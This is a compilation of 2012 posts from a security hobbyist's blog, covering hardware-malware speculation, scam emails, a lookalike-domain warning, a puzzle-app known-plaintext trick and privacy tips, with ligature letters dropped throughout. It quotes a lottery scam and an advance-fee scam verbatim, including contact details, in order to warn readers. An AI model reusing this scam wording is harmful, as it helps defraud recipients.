Its not becoming uncommon to see viruses once again infecting the boot sector of a hard disk, in order to maintain their infection of a system. There have even been reports of viruses infecting the [1]BIOS, capable of maintaining infection after a full harddisk wipe. But what if your actual hardware had an infection permanently programmed in? Its not unheard of for consumer electronics such as [2]digital photo frames to be manufactured and sold with malware installed at the factory. What if the actual hardware design included a piece of malware designed to fail at a certain date/time or even phone home? While the chances of this occurring are unlikely, its still a possibility. Chances are that if a piece of hardware were modied that signicantly, it would most likely be deliberate actions of a well funded organization, with malware rivaling that of Stuxnet or Duqu. This organization would need to do a lot more than just infect a USB stick - the organization would need someone on the inside of the manufacturing process to implement any hardware based malware, and most likely would be government funded. This malware would be well beyond the complexity of Stuxnet or Duqu, as it would be malware written at the physical hardware layer, incorporated into the equipment. The applications for such a piece of malware are very limited. While espionage would be a likely candidate, it would be ill advised - any malware which would phone home from the physical layer would be detected by network monitoring tools, and the hardware would be taken out of service. Once the physical defect was uncovered by researchers, a bulletin would be issued worldwide to discontinue use of that device. A more likely application of hardware based malware would be sabotage. Deliberately design a device to fail at a specied date/time. Consider this scenario for a minute...what would happen if half the switches running the Internet backbone would fail simultaneously? Communication would be severely crippled. Then apply this one step further to hardware such as digitally controlled water pumps, generators, dam controls... Simultaneous 82
2.4. April
BlogBook
failure of multiple components on a nationwide or global scale could have disastrous consequences. While the likelihood of this being detected at a manufacturer level is relatively high, thanks to quality control processes, if a hardware based piece of malware were missed by a manufacturer, or intentionally introduced by a manufacturer under direction of its government, once a piece of hardware leaves the factory, hardware based malware would be near impossible to detect until it was too late. Ultimately, this raises the question of how well do you trust your manufacturers? Are you having a local, trusted manufacturer youve dealt with for years build your equipment, or do you outsource your manufacturing to the cheapest supplier overseas who youve never even met face-to-face? In a world where best practices such as conguration management and conguration standardization are becoming key, should a piece of hardware based malware be created, conguration standardization may ultimately be our own downfall. Unfortunately, much like Stuxnet and Duqu, its no longer a question of if hardware based malware will appear, but how soon...
1. http://news.softpedia.com/news/Mebromi-BIOS-Virus-Out-in-the-Wild-221702.shtml 2. http://www.computerworld.com/s/article/9058638/Best_Buy_sold_infected_digital_picture_frames
2.4.7
Surely this is a legit lottery email and not a scam... (2012-04-18 15:26)
This email just showed up in my inbox...
Subject: .YOUR EM,AIL HAS WON,N Date: Wed, 18 Apr 2012 20:55:19 +0200 It has nally come to our notice that you have not claimed your winning price. We want to verify if truly you are the owner of the email address that has won the 2012 Microsoft Email lottery draw. Because we have sent the winning notication to your address but you did not write back. If you are the owner of the email address that has won the Email lottery, we advice you claim your winning price as quick as possible to avoid losing it, as the lottery program might come to an end within the next seven days or next week. Best Regards. Dr. Clinton W. E. Bateman (Coordinator M.S. Lotto) Tel: +44-703-184-1863 +441212880874 EMAIL: infomsloto@mslot-agent.info.ms
Surely this is a legitimate email, right? The lottery scam seems to be growing in numbers, and no end appears to be in sight. For those not familiar with it, the recipient is typically asked to submit taxes, transfer fees, etc. Here is an excellent resource on the topic: [1]http://www.fraudaid.com/scamspam/lottery/index.htm Here are full headers in case anyone in interested...
Received: by 10.112.131.196 with SMTP id oo4csp109311lbb; Wed, 18 Apr 2012 11:58:45 -0700 (PDT) Received: by 10.68.219.200 with SMTP id pq8mr8566500pbc.55.1334775524668; Wed, 18 Apr 2012 11:58:44 -0700 (PDT) Return-Path: <tanstoseat@try.lotuslive.com> Received: from outbound1-nonen.mail.lotuslive.com (outbound1-nonen.mail.lotuslive.com.
83
BlogBook
2.4. April
[8.12.152.102]) by mx.google.com with ESMTPS id l3si28833024pbs.4.2012.04.18.11.58.43 (version=TLSv1/SSLv3 cipher=OTHER); Wed, 18 Apr 2012 11:58:44 -0700 (PDT) Received-SPF: pass (google.com: domain of tanstoseat@try.lotuslive.com designates 8.12.152.102 as permitted sender) client-ip=8.12.152.102; Authentication-Results: mx.google.com; spf=pass (google.com: domain of tanstoseat@try.lotuslive.com designates 8.12.152.102 as permitted sender) smtp.mail=tanstoseat@try.lotuslive.com Received: from c-in3ol01-01.sv2.lotuslive.com (unknown [10.6.31.41]) by c-in3obnd01-03.sv2.lotuslive.com (Postx) with ESMTP id 07D7F7B2667 for <XXXXXXXXX@gmail.com>; Wed, 18 Apr 2012 18:55:30 +0000 (GMT) Received: from c-in3ol01-01.sv2.lotuslive.com (unknown [127.0.0.1]) by c-in3ol01-01.sv2.lotuslive.com (Postx) with ESMTP id D831D6FD01 for <XXXXXXXXX@gmail.com>; Wed, 18 Apr 2012 18:55:29 +0000 (GMT) Received: from uscl3-no01-ws12.ben.sv2.lotuslive.com (c-in3ws01-06.sv2.lotuslive.com [10.6.31.114]) (sender tanstoseat@try.lotuslive.com) by c-in3ol01-01.sv2.lotuslive.com (LotusLive iNotes outlter/0.91) with SMTP; Wed, 18 Apr 2012 18:55:26 +0000 Message-ID: <20120418185522.30420.qmail@c-in3ws01-06.sv2.lotuslive.com> Cc: recipient list not shown: ; Received: from unknown (HELO smtp.mail.lotuslive.com) (tanstoseat@try.lotuslive.com@31.174.239.199) by uscl3-no01-ws12.fen.sv2.lotuslive.com with SMTP; 18 Apr 2012 18:55:22 -0000 Reply-To: <.a@noreply.com> From: *Microsoft* Email Loto*2012 <masxdfg@hotmail.com> Subject: .YOUR EM,AIL HAS WON,N Date: Wed, 18 Apr 2012 20:55:19 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset=Windows-1251 Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Antivirus: avast! (VPS 120418-1, 18/04/2012), Outbound message X-Antivirus-Status: Clean X-CMAE-Score: 0 X-CMAE-Analysis: v=2.0 cv=Drp/CRD+ c=1 sm=1 a=Dyoqhi TatcA:10 a=8uJ5MO MQBgA:10 a=lGr3UWs4Ur8A:10 a=BLceEmwcHowA:10 a=Cfj4BQAnxiAA:10 a=PNUFLNqkAAAA:8 a=fP6YYZurAn-X523HlxEA:9 a=vUkLqrBayiBQqtPNAGEA:7 a=Ft8UYL4EG9YA:10 a=pDc5FA69erMA:10 a=4 OkANz4rm5RFRib:21 a=c pWzpkRV3-DngXB:21 a=WkljmVdYkabdwxfqvArNOQ==:117 x-tagline: tagged It has nally come to our notice that you have not claimed your winning price. We want to verify if truly you are the owner of the email address that has won the 2012 Microsoft Email lottery draw. Because we have sent the winning notication to your address but you did not write back. If you are the owner of the email address that has won the Email lottery, we advice you claim 84
2.5. May
BlogBook
your winning price as quick as possible to avoid losing it, as the lottery program might come to an end within the next seven days or next week. Best Regards. Dr. Clinton W. E. Bateman (Coordinator M.S. Lotto) Tel: +44-703-184-1863 +441212880874 EMAIL: infomsloto@mslot-agent.info.ms
1. http://www.fraudaid.com/scamspam/lottery/index.htm
2.4.8
The scammers just keep getting dumber... (2012-04-23 16:34)
Got this email today:
Good Day Dearest One Dear !! I am Madam.Sonia Zuru I am a widow being that I lost my husband,my husband was a serving director of the Cocoa exporting board until his death.He was assassinated by the rebels following the political uprising, before his death he made a deposit of Six Million Five Hundred Dollars ( $ 6,500,000.00) here in Ouagadougou Burkina Faso in one of the Security Company,he intended to buy a Cocoa processing Machine with the fund.I want you to help me for us to retrieve this fund and transfer it to your account in your country or any safer place as you will be the beneciary and recipient of the fund which we will use for joint investment in your country.I have plans to do investment in your country, like real estate and industrial production.This is my reason for writing to you. Please if you are willing to assist me and my only Daughter Linda Zuru, Telephone REMOVED Thanks and best regards . Madam Sonia Zuru Ive never priced a cocoa processing machine, but something tells me over $6 million is a little excessive. Im also kinda disappointed. $6.5 million is pocket change compared to the scams I used to receive. I know the economy is tough right now, but its not like these scammers are actually oering real money. Add a few more zeros to that and you might perk my interest.
2.5
2.5.1
May
New Terms of Use - $500 Processing Fee for Comment Spam (2012-05-06 16:17)
Due to an increase in spam, Ive had to add a [1]Terms of Use page. In summary, the Terms of Use for this site explicitly state that any unsolicited advertisements within comments agree to a $500 comment processing fee for each link within the comment. Comments which are not unsolicited advertisements are exempt from this processing fee.
1. http://caffeinesecurity.blogspot.com/p/terms-of-use.html
2.5.2
My Letter to a Spammer (2012-05-06 17:00)
I decided to take the time to notify one of the businesses which has been spamming my blog with comments that Im just not going to take it anymore. Here is the letter in full. Note that the company name is being withheld because I dont want them to get any more web trac from my blog.
85
BlogBook
2.5. May
Hello, This is to notify you that an unsolicited advertisement for your business was recently posted on my blog, Caeine Security. Please note that as a computer professional, I take spam seriously and it will not be tolerated. Due to a recent increase in spam on my blog, I have implemented a new Terms of Use which I encourage you to review. In short, any future unsolicited advertisements for your business will be subject to a $500 comment processing fee for each link posted. Because your unsolicited advertisement was posted before this Terms of Use was in eect, any pre-existing advertisements are not subject to this processing fee. However, all future unsolicited advertisements will be subject to this processing fee. Third party advertising services and automated applications posting these comments on your behalf are considered your agent, and accept these terms on your behalf. If you do not wish to be subject to this fee in the future, I highly advise you discontinue unsolicited comment advertisements on blogs immediately. If these advertisements are being posted by a 3rd party advertisement service, the recommended course of action is to notify this advertisement service immediately to discontinue unsolicited advertisements. Thanks, Ken Caeine Security
2.5.3
Hacking Your Digital Camera (2012-05-08 22:55)
Not all hacking is bad. Sometimes hacking can be used to enhance the features of a product, instead of perform malicious actions. One of my hobbies is photography. Today I downloaded the [1]Canon Hack Development Kit (CHDK) for my Canon Powershot S2 IS. After a couple wrong versions, I nally downloaded the correct version for my camera, and was up and running. The way the CHDK works is pretty ingenious. The CHDK software is loaded into your cameras RAM by tricking your camera into thinking its loading a rmware update. However, instead of loading a rmware update, CHDK is temporarily loaded into memory much like running an application on your computer or phone - its not loaded into memory the next time you turn o and turn back on your camera. The features enabled with CHDK are pretty amazing. My point and shoot camera now has some features which arent available on my wifes professional camera, such as motion detection or extended time-lapse photography of up to 64 seconds (some cameras allow up to 30 minute time lapse!). If you have a [2]supported camera I highly encourage you to check it out.
1. http://chdk.wikia.com/wiki/CHDK 2. http://chdk.wikia.com/wiki/FAQ#Q._What_camera_models_are_supported_by_the_CHDK_program.3F
2.5.4
Android for the Paranoid: Fake GPS (2012-05-10 20:23)
This is the rst article in a series of articles highlighting applications for security conscious users. Today were going to take a look at an Android application called Fake GPS. First, why does Fake GPS qualify as a security application? Many Android applications are location aware, meaning the application may not only nd out where you are, but also report this information to the developer and advertisers, and possibly even post this information publicly. Another serious issue is that by default Androids camera will embed your GPS location inside your photos. This means when you post a photo online, everyone will know exactly where you are! The solution to this problem is Fake GPS. When combined with the Android feature Mock Location, this 86
2.5. May application allows you to trick your phone into thinking youre somewhere else.
BlogBook
[1] The above photo appears to have been taken in Phoenix, Arizona.
[2] And this photo appears to have been taken in Florida. How can you see the embedded GPS coordinates? With an [3]EXIF viewer. Heres the info for the rst photo: [4]http://regex.info/exif.cgi?dummy=on &imgurl=http %3A %2F %2Fi46.tinypic.com %2Frvaeep.jpg
87
BlogBook
2.5. May
Fake GPS is very easy to use. Simply use a scrollable/zoomable map and choose where you want the GPS coordinates to be set. You can even go into the advanced options and have the GPS move in a random direction and speed. So, if youre worried about someone tracking your every move with your cell phone, I highly recommend Fake GPS.
1. http://i46.tinypic.com/rvaeep.jpg 2. http://i48.tinypic.com/2whm5o3.jpg 3. http://regex.info/exif.cgi 4. http://regex.info/exif.cgi?dummy=on&imgurl=http%3A%2F%2Fi46.tinypic.com%2Frvaeep.jpg
2.5.5
Do you test your Antivirus updates before deployment? (2012-05-15 12:59)
If your system uses Avira Antivirus, you probably wont be reading this post today. According to ZDnet, an Avira Antivirus update today crippled [1]millions of computer systems. This isnt the rst time an Antivirus update has crippled Windows systems. Back in 2010 McAfee pushed out a DAT update which sent computers into [2]endless reboot cycles. What can you do to help protect your organization against these disasters? Its simple...test your software updates. Even antivirus denition updates can cause catastrophic failures across your enterprise... And just in case something slips through the cracks...have a backup plan. Are you prepared for a worst case scenario where every active computer system in your organization is unusable? How do you keep your organization running? How do you recover from something that widespread in a timely manner, and restore normal business functionality? Keep these questions in mind, and as we always said in Boy Scouts...Be Prepared.
1. http://www.zdnet.com/blog/security/avira-antivirus-update-cripples-millions-of-windows-pcs/12129 2. http://www.switched.com/2010/04/21/mcafee-update-sends-windows-xp-machines-into-endless-reboot/
2.5.6
Warning: CaeineSecurity dotcom is not mine! (2012-05-23 09:22)
Just a warning to everyone, there was a recent registration of CaeineSecurity.com This site is NOT me. The domain was registered by proxy, so its hard to tell who might actually own it. Domain registration info follows:
domain: caeinesecurity.com created: 21-May-2012 last-changed: 21-May-2012 registration-expiration: 21-May-2013 nserver: zoe.ns.cloudare.com 173.245. 58.149 nserver: dan.ns.cloudare.com 173.245.59 .108 status: CLIENT-TRANSFER-PROHIBITED registrant-rstname: Oneandone registrant-lastname: Private Registration registrant-organization: 1 &1 Internet, Inc. - http://1and1.com/contact registrant-street1: 701 Lee Road, Suite 300 registrant-street2: ATTN: caeinesecurity.com registrant-pcode: 19087 registrant-state: PA 88
2.5. May registrant-city: Chesterbrook registrant-ccode: US registrant-phone: +1.8772064254 registrant-email: (removed to prevent spam) admin-c-rstname: Oneandone admin-c-lastname: Private Registration admin-c-organization: 1 &1 Internet, Inc. - http://1and1.com/contact admin-c-street1: 701 Lee Road, Suite 300 admin-c-street2: ATTN: caeinesecurity.com admin-c-pcode: 19087 admin-c-state: PA admin-c-city: Chesterbrook admin-c-ccode: US admin-c-phone: +1.8772064254 admin-c-email: (removed to prevent spam) tech-c-rstname: Oneandone tech-c-lastname: Private Registration tech-c-organization: 1 &1 Internet, Inc. - http://1and1.com/contact tech-c-street1: 701 Lee Road, Suite 300 tech-c-street2: ATTN: caeinesecurity.com tech-c-pcode: 19087 tech-c-state: PA tech-c-city: Chesterbrook tech-c-ccode: US tech-c-phone: +1.8772064254 tech-c-email: (removed to prevent spam) bill-c-rstname: Oneandone bill-c-lastname: Private Registration bill-c-organization: 1 &1 Internet, Inc. - http://1and1.com/contact bill-c-street1: 701 Lee Road, Suite 300 bill-c-street2: ATTN: caeinesecurity.com bill-c-pcode: 19087 bill-c-state: PA bill-c-city: Chesterbrook bill-c-ccode: US bill-c-phone: +1.8772064254 bill-c-email: (removed to prevent spam)
BlogBook
2.5.7
Keep an eye out for fake Yahoo Browser Plugins! (2012-05-24 11:07)
According to Sophos, Yahoo! recently released a browser search plugin called Yahoo! Axis for Chrome, Firefox, Safari, and IE 9. During this release, Yahoo! accidentally [1]included the private key used to sign the packages inside the Chrome extension package. This means anyone who downloaded the package now has Yahoo!s private signing key and could make their own copy of the plugin and [2]insert malicious code. As a safeguard, if you decide to use Yahoo! Axis, make sure you download the plugin only from Yahoos [3]ocial download site.
89
BlogBook
2.6. June
1. http://nakedsecurity.sophos.com/2012/05/24/yahoo-leaks-its-own-private-key-via-new-axis-chrome-extension/ 2. https://nikcub.appspot.com/posts/yahoo-axis-chrome-extension-leaks-private-certificate-file 3. http://axis.yahoo.com/
2.6
2.6.1
June
Stuxnet not the rst Nation-Sponsored Cyber Attack (2012-06-04 11:52)
Very recently it was revealed that the famous malware Stuxnet was created as a [1]joint operation by the U.S. and Israel. Its important to point out that this isnt really new, as nations have been waging so-called cyber warfare for years now. Make no mistake, there are plenty of other pieces of malware in existence which have been designed for espionage or sabotage. One such piece of malware may be the [2]Hutizu malware, which was found on the Caeine Security honeypot earlier this year. And this denitely isnt the rst time a nation has attacked another through cyber warfare...just ask the country [3]Georgia. While many will condemn cyber warfare actions, I personally applaud them. After all, if a cyber weapon such as Stuxnet [4]can be used instead of real weapons, resulting in no loss of human life, then isnt that better than sending in planes and tanks? What will be interesting is, now that the U.S. and Israel have openly entered the cyber warfare arena, how many nations will begin open cyber warfare against them? There is a Chinese curse May you live in interesting times. For those of us in the cyber security eld, I have a feeling that curse is now upon us.
1. http://phys.org/news/2012-06-stuxnet-decoded.html 2. http://caffeinesecurity.blogspot.com/search/label/Hutizu 3. http://bits.blogs.nytimes.com/2008/08/11/georgia-takes-a-beating-in-the-cyberwar-with-russia/?ref=business 4. http://www.internetevolution.com/author.asp?section_id=771&doc_id=245072&f_src=internetevolution_gnews
2.6.2
And you Thought your Password Requirements Were Bad... (2012-06-04 13:21)
Apparently everything is bigger in Texas, including ridiculousness of password requirements... From [1]http://portal.cs.oag.state.tx.us/OAGStaticContent/portal/logi n/help/ChangePassword.htm
Remember that the new password must fulll these requirements: 1. The password must be exactly 8 characters long. 2. It must contain at least one letter, one number, and one special character. 3. The only special characters allowed are: @ # $ 4. A special character must not be located in the rst or last position. 5. Two of the same characters sitting next to each other are considered to be a set. No sets are allowed. 6. Avoid using names, such as your name, user ID, or the name of your company or employer. 7. Other words that cannot be used are Texas, child, and the months of the year. 8. A new password cannot be too similar to the previous password. 1. Example: previous password - abc #1234, acceptable new password - acb $1243 90
2.7. July 2. Characters in the rst, second, and third positions cannot be identical. (abc*****)
BlogBook
3. Characters in the second, third, and fourth positions cannot be identical. (*bc #****) 4. Characters in the sixth, seventh, and eighth positions cannot be identical. (*****234) A password can be changed voluntarily (no Help Desk assistance needed) once in a 15-day period. If needed, the Help Desk can reset the password at any time. The previous 8 passwords cannot be reused.
1. http://portal.cs.oag.state.tx.us/OAGStaticContent/portal/login/help/ChangePassword.htm
2.7
2.7.1
July
Watch my Honeypot LIVE! (2012-07-10 01:07)
Ive decided to start streaming my honeypot on UStream. No set hours for this yet, but it should be interesting when it is live! Please feel free to check it out over at my [1]UStream Channel. Also, keep an eye on my [2]Twitter for when I go live!
1. http://www.ustream.tv/channel/caffsec 2. http://twitter.com/caffsec
2.7.2
One Image can Change The World (2012-07-17 18:32)
2.7.3
New Hacktool Found on my Honeypot nt (2012-07-18 19:56)
A script kiddy dropped o a new hack tool on my honeypot today. Todays guest hails from 77.28.151.190 which is in Macedonia, The Former Yugoslav Republic of(MK) in Eastern Europe. The le dropped o rdp.tgz is a Linux hack tool for remotely cracking Windows FTP and NT le shares. I was somewhat disappointed that the hack tool isnt more complex, however, since it is still a new hack tool which isnt detected by an antivirus software, I gured it was worth mentioning. Ive uploaded a full analysis at: [1]http://code.google.com/p/casec-malware-analysis/source/brow se/trunk/nt
1. http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/nt
91
BlogBook
2.7. July
2.7.4
QR Code Analyzer - Android for the Paranoid (2012-07-20 07:22)
Sometimes, you nd that some apps just arent enough for the paranoid. Sometimes available apps in the marketplace just arent sucient for a paranoid person to fulll their security obsession. One gap Ive found is that there appears to be no app out there to analyze QR codes for malware, outside anti-virus software. In response to this, using MIT App Inventor, I have created an app which uses VirusTotal.coms API in order to submit QR code URLs for scanning. Note that this app does NOT address possible security aws with QR codes themselves. However, it does submit any URL a QR code contains to VirusTotal, and provides a link to the resulting report. I encourage you to try out this wonderful new app. The latest version can be downloaded here: [1]http://code.google.com/p/casec-malware-analysis/downloads/l ist Source code is also available: [2]http://code.google.com/p/casec-malware-analysis/source/brow se/trunk/tools/QRAnalyzer
[3] 92
2.7. July
BlogBook
[4]
1. http://code.google.com/p/caffsec-malware-analysis/downloads/list 2. http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/tools/QRAnalyzer 3. http://4.bp.blogspot.com/-h1FVzQpxFFI/UAmUQgqT-5I/AAAAAAAAALY/xEmvuEGduQU/s1600/QRAnalyzer1.jpg 4. http://4.bp.blogspot.com/-SwCqwORcazU/UAmUZhekm9I/AAAAAAAAALg/fFC5ZLPysxE/s1600/QRAnalyzer2.jpg
2.7.5
Printer Malware - The Next Big Threat? (2012-07-23 13:54)
Does your organization secure their printers? Many modern multi-function printers have their own mini-servers built in, oering web, ftp, and le share access. These printers, when not properly secured, can pose just as high a security risk as unsecured, non-isolated SCADA devices. Related Reading: [1]Indian businesses also aected as oce printers hit globally by gibberish computer virus [2]SANS: Auditing and Securing Multifunction Devices
1. http://www.newstrackindia.com/newsdetails/2012/06/23/ 97-Indian-businesses-also-affected-as-office-printers-hit-globally-by-gibberish-computer-virus-.html 2. http://www.sans.org/reading_room/whitepapers/networkdevs/auditing-securing-multifunction-devices_1921
2.7.6
London 2012 Olympics Malware and Scam Alert (2012-07-23 23:05)
Its important to note that with the London 2012 Olympics rapidly approaching, computer users should be on the lookout for spam message as well as malicious web search results featuring the London 2012 Olympics. TrendMicro has already found some [1]scams in the wild advertising supposed free tickets to the London 2012 Olympics. An Olympics-themed trojan has already been [2]spreading through social networks. AVG has a [3]preview of additional malware threats which may be associated with the London 2012 Olympics, as well as some important tips for avoiding an Olympic-themed malware infection. It is very important to make sure your friends and family know how to look for suspicious links, messages, or emails regarding the Olympics.
93
BlogBook Remember the old saying If its too good to be true, it probably isnt true.
2.7. July
1. http://blog.trendmicro.com/spammed-messages-cash-in-on-london-2012-olympics/ 2. http://news.softpedia.com/news/Olympics-Malware-Spreads-by-Interacting-with-Facebook-and-Skype-282382.shtml 3. http://blogs.avg.com/consumer/avg-codeword-london-olympics-2012-malware-risks/
2.7.7
How I cracked the NSA Crypto Challenge in Record Time (2012-07-28 23:33)
The NSA recently released an Android App called the [1]NSA Crypto Challenge. Being in the security eld, I was very interested in this app. So of course I decided to give it a try, and see how quickly I could break the codes. Being ambitious, I decided to jump straight into Advanced mode. My score? 2 minutes, 43 seconds.
[2]
Now for those of you who have played this game on advanced mode, youre probably amazed by the speed which I was able to decode this. For those who havent played it yet, let me show you an example puzzle on Advanced mode. 94
2.7. July
BlogBook
[3]
I would have decoded this puzzle a lot quicker, but unfortunately Im not a very fast typist with an on-screen keyboard. Now youre probably wondering how I can decrypt this text so fast? The secret is to attack the puzzle with known plaintext, something the NSA probably wasnt expecting you to do. Its a little known fact that Android .apk installers are actually compressed archive zip les. To peek under the hood, all you need to do is download the .apk, and rename it to .zip. Inside, youll see a folder structure similar to this:
[4]
Once youve entered the archive, its just a matter of traversing folders until you nd something interesting...like this:
95
BlogBook
2.7. July
[5] There are all sorts of interesting les underneath the Resources folder. The rst that stands out is Cipher.txt. I wonder what that is...
[6] It just happens to be the encryption and decryption algorithms! Unfortunately, the algorithms use a completely random key. So this wont help us solve the puzzle. But wait, remember that folder PuzzlePacks? I wonder whats in there?
[7] These les look promising. Could it be that these les contain the original plaintext puzzles? 96
2.7. July
BlogBook
[8] In fact yes they do, in XML format. Now that we have the original plaintext, we can perform a known plaintext attack against the puzzle. Count the number of characters in each word for the example puzzle. You dont have to do every word, just the rst two or three should do.
[9] Now we know were looking for plaintext with 1 letter followed by 8 letters followed by 4 letters. A quick scan of the plaintext les nds the following:
A wireless room set up in the Bletchley Park mansions water tower was codenamed Station X.
So, we simply start substituting letters, and weve solved our puzzle!
97
BlogBook
2.7. July
[10] Is this cheating? Well, not really. Known plaintext attacks are very commonly used, and in fact helped the Allies crack German Enigma Machine codes in World War II. No doubt this is not an attack method that the developers of this software intended...but when youre cracking encryption codes, sometimes you need to think outside the box.
1. https://play.google.com/store/apps/details?id=com.caci.nsacryptochallenge 2. http://3.bp.blogspot.com/-Sb7Dc_82sqw/UBSoVKte66I/AAAAAAAAALw/OrKwAs_Tq68/s1600/nsa.jpg 3. http://3.bp.blogspot.com/-m2a6NoDXRkY/UBSpBChm2nI/AAAAAAAAAL4/_StCTZz1EU8/s1600/puzzle1.jpg 4. http://2.bp.blogspot.com/-4KVeK7nTIfg/UBSqboK2uII/AAAAAAAAAMA/PgtjHNiFwFY/s1600/nsacrypto1.png 5. http://4.bp.blogspot.com/-aqtU92u-1WY/UBSq8IQmcKI/AAAAAAAAAMI/-a0FLW_sj-U/s1600/nsacrypto2.png 6. http://3.bp.blogspot.com/-R46vXnWt7MU/UBSrkuhwDDI/AAAAAAAAAMQ/1vAcda6Yodc/s1600/nsacrypto3.png 7. http://3.bp.blogspot.com/-ew_DdtDW65M/UBSsLr5vYtI/AAAAAAAAAMY/Ge8unf6H6_Y/s1600/nsacrypto4.png 8. http://3.bp.blogspot.com/-kIgCaLmDx-k/UBSskO-A_uI/AAAAAAAAAMg/EtQaH3ns_jU/s1600/nsacrypto5.png 9. http://4.bp.blogspot.com/-pYAPTLuztJM/UBStfppYN8I/AAAAAAAAAMo/JstpzkzIkLM/s1600/puzzle3.jpg 10. http://1.bp.blogspot.com/-jQM3z4bZW8I/UBSt99vscDI/AAAAAAAAAMw/kd2g1X4iQ0U/s1600/puzzle2.jpg
2.7.8
Software Spotlight: Sysinternals RootkitRevealer (2012-07-31 11:17)
So, Im surprised I didnt know about this little gem of software until today. Sysinternals has a wonderful piece of software called [1]RootkitRevealer which shows oddities in the registry and lesystem, indicating a possible hidden rootkit. Unfortunately, it appears to only support Windows XP/2003. If anyone knows of similar software which supports Linux/Mac/Vista/7/etc, Id be very interested to hear about it. Always looking for new resources for my bag of tricks!
1. http://technet.microsoft.com/en-us/sysinternals/bb897445.aspx
98
2.8. August
BlogBook
2.8
2.8.1
August
Default Facebook Privacy Settings Randomly Not Working (2012-08-07 17:00)
It has come to my attention that the default Facebook privacy settings are not properly functioning at seemingly random times. Unfortunately you have no idea the settings arent working correctly until after you post something...
[1] Despite my default setting of Friends Only, Ive noticed multiple posts being available to everyone, as indicated by the globe icon below.
[2] It may be worth checking your old posts to see who has access to them. You may be surprised to nd some of your posts were set to public. I have posted about this issue on Facebooks support page, but expect little response. One possible workaround to this issue is to go into your Facebook Privacy Settings, change your post privacy to public, then back to Friends Only. This appears to have corrected the issue for me, for now. If anyone else has encountered this issue, I encourage you to post a comment, and if you managed to x it or not.
1. http://1.bp.blogspot.com/-MeN152egdcg/UCFGzsS_fyI/AAAAAAAAANI/11ES9gW51RQ/s1600/privacyFAIL2.PNG 2. http://3.bp.blogspot.com/-M7JXQFtDoPw/UCFEzXMhi7I/AAAAAAAAANA/IQOOdUbY-j4/s1600/privacyFAIL.PNG
99
BlogBook
2.9. September
2.8.2
Time is Running Out:

(2012-08-12 18:04)
The 2038 Problem (also known as Y2K part two)
2.9
2.9.1
September
Having Fun with the EICAR Test File (2012-09-06 17:00)
For those not familiar with it, the EICAR Test File is a text le commonly used for verifying Antivirus software is properly working. More info can be found on [1]EICAR.org I stumbled upon an interesting bugtraq post from 2003 which I felt was worth sharing. The [2]post disassembles the EICAR test le and looks at how it works. Interesting read, especially if youre interested in programming.
1. http://www.eicar.org/86-0-Intended-use.html 2. http://archive.cert.uni-stuttgart.de/bugtraq/2003/06/msg00251.html
2.9.2
Why Wikipedia should never be used as a Technical Reference (2012-09-09 07:04)
Theres been a lot of talk about Wikipedia lately over at Slashdot, with regard to Wikipedia [1]shifting from using primary to secondary sources. When Im researching a technical issue, and a Wikipedia result is returned, I immediately skip over it. I used to be able to trust Wikipedia as a landing page to nd a brief overview of what Im looking for, then locate additional information. But not anymore. There is an ever-growing trend on Wikipedia to create a leaner Wikipedia by simplifying articles, combining articles, and deleting articles. First case in point is the Wikipedia page for [2]Microsoft Macro Assembler. As of this blog post, this is a very small page with History, Object module formats supported by MASM, Some third-party tools that support MASM, and Assemblers compatible with MASM as the main content sections. Strangely missing is the details on the actual MASM assembly language. Theres no link to another wiki page. There may be a few references at the bottom to the language, but nothing in the article itself. I considered adding to the article, but then I noticed in the history that there used to be a rather excellent overview of the MASM assembly language, but someone [3]deleted it with the following reason:
major cleanup; remove poorly written and messy MASM assembly language details section which discusses specic aspects of MASM and is best suited for a users guide I was really hoping this was a one-o occurrence, but the more I look through Wikipedia, the more saddened I am that the entire community has turned into one large bickering and arguing festival over [4]what needs to be deleted. A somewhat related article, [5]Open Watcom Assembler, has been the victim of merciless edits by multiple users who possibly have no idea what an assembler even is. Lets look at the curious history of Open Watcom Assemblers Wikipedia article... The article was rst [6]created on January 28, 2010 with references to material which have nothing to do with the assembler. In fact, one of the references is a C/C++ cryptography book. After someone noticed on February 1, 2010, the irrelevant references were [7]removed:
Removed References with non-substantial reference in Leiterman which simply says: I do not use it these days, but there is also the Watcom C/C++ with their WASM Assembler. 100
2.9. September
BlogBook
...only to be [8]re-added minutes later by the original author. An edit war ensued by multiple users, to the point that on February 2, 2010, the article was [9]nominated for deletion as not meeting notability requirements instead of attempting to improve it further and provide valid references. Fortunately the nomination for deletion resulted in Keep on February 10, 2010. However, the edit war and nomination for deletion appears to have resulted in all involved parties becoming so discouraged that they stopped working on the article. The article [10]was not edited again until June 23, 2010, several months later. Events such as the above two examples are why I refuse to use Wikipedia as a technical reference, and why I no longer contribute there. I was never involved in any major disputes at Wikipedia, but I have seen the hard work of others completely disappear because someone who has no idea what an article is even about decides the page needs to be cleaned up, possibly because they dont understand some of the more technical information on the page. Wikipedia editors have known that deletionism is a growing problem for many years, and even have an [11]article devoted to the documenting the issue, which was created in 2008. Interestingly (and ironically) enough, shortly after the article was written, it too was [12]nominated for deletion. If anyone knows a good publicly accessible alternative to Wikipedia for technical resources, please do share, Ill be happy to contribute.
1. http://news.slashdot.org/story/12/09/08/1521229/when-a-primary-source-isnt-good-enough-wikipedia 2. http://en.wikipedia.org/wiki/Microsoft_Macro_Assembler 3. http://en.wikipedia.org/w/index.php?title=Microsoft_Macro_Assembler&diff=501353117&oldid=500780975 4. http://en.wikipedia.org/wiki/Wikipedia:Articles_for_deletion 5. http://en.wikipedia.org/wiki/Open_Watcom_Assembler 6. http://en.wikipedia.org/w/index.php?title=Open_Watcom_Assembler&oldid=340598915 7. http://en.wikipedia.org/w/index.php?title=Open_Watcom_Assembler&diff=341369130&oldid=341367478 8. http://en.wikipedia.org/w/index.php?title=Open_Watcom_Assembler&diff=341371436&oldid=341369130 9. http://en.wikipedia.org/wiki/Wikipedia:Articles_for_deletion/Open_Watcom_Assembler 10. http://en.wikipedia.org/w/index.php?title=Open_Watcom_Assembler&action=history 11. http://en.wikipedia.org/wiki/Deletionism_and_inclusionism_in_Wikipedia 12. http://en.wikipedia.org/wiki/Wikipedia:Articles_for_deletion/Deletionist_versus_Inclusionist_Controversy
2.9.3
